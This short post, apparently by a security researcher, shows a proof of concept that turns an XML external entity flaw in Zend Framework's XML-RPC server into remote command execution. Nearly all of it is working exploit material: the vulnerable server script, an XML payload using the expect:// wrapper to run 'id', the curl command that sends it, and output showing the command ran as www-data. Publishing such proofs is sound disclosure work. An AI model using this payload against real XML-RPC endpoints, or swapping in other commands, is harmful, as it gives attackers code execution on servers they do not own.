XXE to RCE
This turns https://www.sec-consult.com/files/20120626-0_zend_framework_xxe_injection.txt
into a Remote Command Execution:
NOTE: It relies on the PHP expect module being loaded
(see http://de.php.net/manual/en/book.expect.php)
joern@vbox-1:/tmp$ cat /var/www/server.php
<?
require_once("/usr/share/php/libzend-framework-php/Zend/Loader/Autoloader.php");
Zend_Loader_Autoloader::getInstance();
$server = new Zend_XmlRpc_Server();
echo $server->handle();
?>
joern@vbox-1:/tmp$ cat payload
<!DOCTYPE root [<!ENTITY foo SYSTEM "expect://id">]>
<methodCall>
<methodName>&foo;</methodName>
</methodCall>
joern@vbox-1:/tmp$ curl http://localhost/server.php -d @payload
<?xml version="1.0" encoding="UTF-8"?>
<methodResponse>
<fault><value><struct><member><name>faultCode</name><value><int>620</int></value></member><member><name>faultString</name><value>
<string>Method "uid=33(www-data) gid=33(www-data) groups=33(www-data)
" does not exist</string>
</value></member></struct></value></fault></methodResponse>joern@vbox-1:/tmp$
Read other posts